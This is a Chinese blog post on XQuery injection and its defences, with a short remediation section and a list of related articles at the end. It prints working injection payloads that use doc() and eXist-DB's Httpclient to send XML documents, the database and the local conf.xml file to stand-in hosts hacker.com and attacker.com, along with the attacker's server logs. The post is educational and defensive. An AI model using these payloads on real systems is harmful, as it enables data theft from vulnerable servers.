XQuery 注入的介绍与代码防御

最新推荐文章于 2020-09-08 13:01:27 发布
最新推荐文章于 2020-09-08 13:01:27 发布
阅读量1.6k 收藏 1
点赞数
分类专栏: 应用安全 文章标签: XQuery 注入 修复 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29277155/article/details/52749713
版权

 

0x01 介绍

      XQuery是XPath的超集,如果Xpath只是一个查询语言,XQuery是一个程序语言,可以声明自定义的功能、变量等等。类似XPath注入,XQuery注入在没有验证用户输入的情况下也会发生。一个程序使用用户名查询博客实体,后端使用XQuery查询XML数据。

 

查询实例

用户输入admin,在后台执行的查询为:

for $blogpost in//post[@author=’admin’]
 return
<div>
  <hr />
   <h3>{$blogpost/title}</h3><br/>
   <em>{$blogpost/content}</em>
  <hr />
 </div>

如果用户输入admin’] let $x :=/*[' ,注入后的查询结果为:

for $blogpost in//post[@author=’admin’]
 let $x := /*[‘’]
 return
<div>
  <hr />
   <h3>{$blogpost/title}</h3><br/>
   <em>{$blogpost/content}</em>
  <hr />
 </div>

攻击者可以在let $x := /*[‘’]中插入任何想执行语句都会在循环中执行,它会通过所有当前执行文件中的元素循环发出一个GET请求到攻击者的服务器。

2 URL攻击

http://vulnerablehost/viewposts?username=admin%27%5D%0Afor%20%24n%20in%20/%2A%5B1%5D/%2A%0A%09let%20%24x%20%3A%3D%20for%20%24att%20in%20%24n/%40%2A%20return%20%28concat%28name%28%24att%29%2C%22%3D%22%2Cencode-foruri%28%24att%29%29%29%0A%09let%20%24y%20%3A%3D%20doc%28concat%28%22http%3A//hacker.com/%3Fname%3D%22%2C%20encode-foruri%28name%28%24n%29%29%2C%20%22%26amp%3Bdata%3D%22%2C%20encode-foruri%28%24n/text%28%29%29%2C%22%26amp%3Battr_%22%2C%20stringjoin%28%24x%2C%22%26amp%3Battr_%22%29%29%29%0A%09%09%0A%09for%20%24c%20in%20%24n/child%3A%3A%2A%0A%09%09let%20%24x%20%3A%3D%20for%20%24att%20in%20%24c/%40%2A%20return%20%28concat%28name%28%24c%29%2C%22%3D%22%2Cencode-foruri%28%24c%29%29%29%0A%09%09let%20%24y%20%3A%3D%20doc%28concat%28%22http%3A//hacker.com/%3Fchild%3D1%26amp%3Bname%3D%22%2Cencode-foruri%28name%28%24c%29%29%2C%22%26amp%3Bdata%3D%22%2Cencode-for-uri%28%24c/text%28%29%29%2C%22%26amp%3Battr_%22%2Cstringjoin%28%24x%2C%22%26amp%3Battr_%22%29%29%29%0Alet%20%24x%20%3A%3D%20/%2A%5B%27

上面的方法会重复的对攻击者的服务器发送请求,整个XML文档可以通过分析攻击者的服务器访问日志进行获取。

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?name=post&data=&attr_author=admin HTTP/1.1" 200 358"-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?child=1&name=title&data=Test&attr_ HTTP/1.1" 200 357"-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?child=1&name=content&data=My%20first%20blog%20post%21&attr_HTTP/1.1" 200 357 "-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?name=post&data=&attr_author=admin HTTP/1.1" 200 357"-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?child=1&name=title&data=My%20blog%20is%20now%20live%21&attr_HTTP/1.1" 200 357 "-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?child=1&name=content&data=Welcome%20to%20my%20blog%21%20Please%20stay%20away%20hackers&attr_HTTP/1.1" 200 357 "-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?name=post&data=&attr_author=admin HTTP/1.1" 200 357"-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?child=1&name=title&data=Test&attr_ HTTP/1.1" 200 357"-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?child=1&name=content&data=My%20first%20blog%20post%21&attr_HTTP/1.1" 200 357 "-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?name=post&data=&attr_author=admin HTTP/1.1" 200 357"-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?child=1&name=title&data=My%20blog%20is%20now%20live%21&attr_HTTP/1.1" 200 357 "-" "Java/1.6.0_31"

X.X.X.X - -[03/Mar/2012:20:21:10 +0000] "GET/?child=1&name=content&data=Welcome%20to%20my%20blog%21%20Please%20stay%20away%20hackers&attr_HTTP/1.1" 200 357 "-" "Java/1.6.0_31"

通过分析拼接的XML为:

<posts>
<postauthor="admin">
<title>Test</title>
<content>My firstblog post!</content>
</post>
<postauthor="admin">
<title>My blog isnow live!</title>
<content>Welcometo my blog! Please stay away hackers</content>
</post>
</posts>

3 Exist-DB

Exist-DB是一个本地XML数据库,允许应用程序使用不同的技术(XQuery 1.0, XPath 2.0,XSLT 1.0 和 2.0.)存储、查询和更新XML数据。区别于其他传统的数据库(定义自己的查询协议),Exist-DB使用基于HTTP的接口进行查询,如REST, XML-RPC, WebDAV 和SOAP。执行一个GET请求,返回一个XML的节点。还是之前用户博客的查询,假设现在使用的是Exist-DB,HTTP查询请求如下

http://www.vulnhost.com/viewposts?username=admin

后台XPath表达式

doc(concat(“http://localhost:8080/exist/rest/db/posts?_query=”,encode-for-uri(“//posts[@author=’admin’]”)) )//*

上面查询//posts[@author=’admin’]会返回所有admin的文章,Exist-DB是一个成熟的数据库并且在很好的支持XPath,如果username变量没有进行净化,攻击者可以获取根节点的内容:

http://www.vulnhost.com/viewposts?username='and doc(concat('http://hacker.com/?q=', encode-for-uri(name(doc('file:///home/exist/database/conf.xml')/*[1]))))or '1' = '1

这条语句会携带根节点发名字请求攻击者的服务器

doc(concat("http://localhost:8080/exist/rest/db/posts?_query=",encode-for-uri("//posts[@author=''and
 doc(concat('http://hacker.com/?q=',encode-foruri(name(doc(‘file:///home/exist/database/conf.xml’)/*[1]))))
 or '1'= '1']")))/*[1]

攻击者可以使用上面的技术获得受害服务器的配置信息。

EXist-DB有一个可扩展的模块,它允许程序员用Java编写的模块创建新的XPath/XQuery函数。通过让邮件模块或其他SMTP服务器,I/O文件系统发送电子邮件。以及支持多种HTTP方法,利用LDAP客户端模块,或在在OracleRDBMS执行Oracle的PL/ SQL存储过程等等。这些模块功能强大,但通常这些模块在默认情况下是禁用的。

HTTP模块很有趣,因为它是两个非常强大的,默认情况下启用。攻击者可以简单地使用它来发送序列化根节点(整个文档)到攻击者的服务器,从而在一次操作中获取整个数据库。

http://www.vulnhost.com/viewposts?username='Httpclient:post(xs:anyURI(“http://attacker.com/”),/*, false(), ())or '1' = '1

在服务器后台的查询如下

doc(concat("http://localhost:8080/exist/rest/db/posts?_query=",encode-for-uri("//posts[@author=’’Httpclient:post(xs:anyURI(“http://attacker.com/”),/*, false(), ()) or ‘1’ =‘1’]")))/*[1]

可以通过DOC功能使HTTP客户端发送任意的本地XML文件到攻击者的服务器

Httpclient:get(xs:anyURI(“http://attacker.com/”),doc(‘file:///home/exist/database/conf.xml’), false(), ())

0x02 威胁影响

    可能会访问存储在敏感数据资源中的信息,获得受害服务器的配置信息

 

0x03 修复思路

 

净化用户输入,fn:doc(),fn:collection(), xdmp:eval() and xdmp:value()这些函数需要特别注意
使用参数化的查询,如Java的Xpath表达式
/root/element[@id=$ID]
限制doc()功能

 

 

欢迎大家分享更好的思路,热切期待^^_^^ !

煜铭2011
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
XML关于Xquery代码
12-05
学习如何使用XMLSPY集成开发环境编写、执行、以及调试XQuery。 理解和掌握XQuery查询计划的基本结构、各种子句的使用、(递归)函数的声明和使用、嵌套查询的使用,能够熟练地利用集成开发环境编写完成各种查询工作...
应用安全系列之十七:xQuery注入
jimmyleeee的专栏
03-12 490
本系列文章主旨在于介绍一些漏洞类型产生的基本原理,探索最基础的解决问题的措施。 关于xQuery标准的详细信息可以参考http://www.w3.org/TR/xquery/, 这里只做简单介绍XQuery语言是用于查询存储在XML数据库的数据的语言,它可以看做是XPath语言的一个超集。主要用到的XQuery的功能包括: 构建XQL查询 从XML数据库获取信息给web服务或者应用 从XML数据库中年获取XML格式的报告 把XML数据转换成XHTML 快速遍历XML树 根据过滤器过滤..
软件测试学习笔记(八)——软件缺陷
CloserSide的博客
09-08 553
软件测试学习笔记(八)软件缺陷缺陷的表现形式缺陷的状态缺陷的信息缺陷的严重程度缺陷修复优先级软件缺陷的分类 软件缺陷 软件缺陷就是软件的问题,最终表现为没有满足用户的需求。 缺陷的表现形式 缺陷的状态 缺陷的信息 缺陷的严重程度 缺陷修复优先级 严重程度高并不代表优先级就会高,比如严重的计算错误,在严重程度上非常高,但在修复优先级上仅仅在软件发布前修复即可。 软件缺陷的分类 ...
web中各种命令注入的检测和利用一
煜铭2011
09-03 8732
0x00 前言          我们都知道在web 中有着各种数据注入攻击,其中有SQL注入、命令注入、XML注入等等。在平时我们渗透测试的任务中,如何快速检测和利用这些注入的漏洞,以下是一些注入命令总结 0x01 SQL 注入 1.1 通用的 SQL 注入攻击字符 查询中断语法    :           单引号(‘),      双引号(“) 注入SQL注释    :
web中各种命令注入的检测和利用二
热门推荐
煜铭2011
09-02 1万+
0x00 前言          我们都知道在web 中有着各种数据注入攻击,其中有SQL注入、命令注入、XML注入等等。在平时我们渗透测试的任务中,如何快速检测和利用这些注入的漏洞,以下是一些注入命令总结 0x01 SQL 注入 1 SQL注入的发现 1.1 通用的 SQL 注入攻击字符 查询中断语法    :           单引号(‘),      双引号(“) 注入SQL注
XML XML Schema XSLT 2.0和XQuery开发详解源代码.rar
12-04
《XML XML Schema XSLT 2.0和XQuery开发详解》一书的示例源代码
xquery与java使用
04-22
java中使用xquery的例子 String fileString = "src/study/xquery/cd_catalog.xml"; //查询语句 String query = " for $s in //CD/TITLE " + " return $s"; //生产文档对象 Document document = getDocument...
springboot+jsp+xquery实现登录认证
07-10
springboot+jsp+xquery实现登录认证
xquery-libs:各种XQuery
05-17
各种库,可与XQuery的第三方Web服务集成
XPath注入漏洞利用工具XPath-XCat.zip
07-19
XCat是一个命令行程序,用于辅助XPath注入漏洞的利用。XCat使用Python编写并开放源代码。XCat正常使用需要python的SimpleXMLWriter模块。 标签:XPath
sonar-xquery-plugin:声纳代码分析工具的插件,可对XQuery文件进行静态代码分析,以发现潜在的安全性,性能和标准问题
05-15
声纳XQuery插件 Sonar代码分析工具的语言插件( )。 已在Sonar 4.3上进行了测试。 如果要使用与Sonar 3.5兼容的版本,请使用此插件的版。 当前,XQuery解析器是使用ANTLR v3生成的,并且支持遵循1.0规范的XQuery。 有一些特定于MarkLogic的附加功能来支持MarkLogic XQuery解析器允许的某些功能。 “要做的事情”之一是升级对MarkLogic 6.0中引入的某些XQuery 3.0语法的支持以及简化语法管理(可能使用IntelliJ GrammarKit插件)。 代码解析检查标记为“ INFO”,因此3.0语法上的解析器故障不应造成破坏性的影响。 用法 ###声纳运行器要构建插件并运行单元测试,只需运行以下命令: mvn install 为了在项目上运行分析,您将需要在本地设置SonarQube 4.3,并将内置插件安
SSI 注入介绍代码防御
煜铭2011
10-07 6110
0x01 介绍 当符合下列条件时,攻击者可以在 Web 服务器上运行任意命令: A. Web 服务器已支持 SSI(服务器端包含)。 B. Web 应用程序在返回 HTML 页面时,嵌入用户输入。 C. 参数值未进行输入清理。 例如,如果脚本接收文本输入,供 Web 服务器稍后处理,下列由 SSI 命令组成的输入便会侵害服务器的安全: (会显示给
Xpath注入攻击及其防御技术研究
weixin_34273046的博客
02-02 493
Xpath注入攻击及其防御技术研究 陆培军 (南通大学 计算机科学与技术学院,江苏 南通226019)     摘 要 XML技术被广泛使用,XML数据的安全性越来越重要。本文简要介绍了XPath注入攻击XML数据的原理。在前人提出的防御通用方法的基础上,提出一个XPath 注入攻击通用检验模型,模型具有普遍意义。     关键词 XPath注入攻击; 防御技术; 模型 ...
XQuery的函数项和高阶函数
BING_SHA的博客
04-16 498
本文摘自XML经典入门(第5版),原书中代码有误,已改正。 1.函数项: 函数项是函数和它的参数的统称。 例如:可以使用一个函数项 sqrt#1 来表示math:sqrt()这一开平方根函数。 2.高阶函数: 所谓高阶的意思就是参数可以是函数。 编写一个简单的函数: declare function local:double-roo...
XQuery
反手一个bug的博客
12-18 970
选取节点 doc(&amp;amp;quot;books.xml&amp;amp;quot;)/bookstore/book[price&amp;amp;amp;lt;30]/title 看一个例子就懂了,选取books.xml中price节点值小于30的book节点下的title节点内容 FLOWER表达式 for $x in doc(&amp;amp;quot;books.xml&amp;amp;quot;)/bookstore/book where
XQuery----XML时代的革命性数据查询语言(曾毅)
erhushenrui的专栏
03-04 1818
在 以文档和数据为中心的环境里,XML自从诞生之后,迅速得到来自各方技术联盟以及研究机构的支持与关注。现在,许多厂商开发的应用程序都使用XML来传送 消息(如SOAP或者XML-RPC消息)或者作为数据的永久性存储(如XML数据库)。在关系型数据库中的数据查询语言SQL,XQuery将成为 XML时代的主流数据查询语言。 XQuery概览 自从计算机网络普及后,互联网便成为了人们获取信息的
Xquery实例演示
YoYo的专栏
09-19 2514
Xquery实例演示本文将重点演示两个Xquery实例,以此来说明Xquery的使用: 1.FLOW的使用 2.Xquery构造器本文示例代码均在Eclipse  oXygen插件下通过测试!1.xml源文件: xml version="1.0" encoding="gb2312"?>xml-stylesheet type="text/xsl" href="users.xsl"?> 用户列
xquery update
最新发布
12-06
XQuery Update是XQuery 1.0的扩展,它允许对XML文档进行更新操作。以下是一个简单的例子,演示如何使用XQuery Update向XML文档中添加新元素: ```xquery declare namespace html = "http://www.w3.org/1999/xhtml";...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值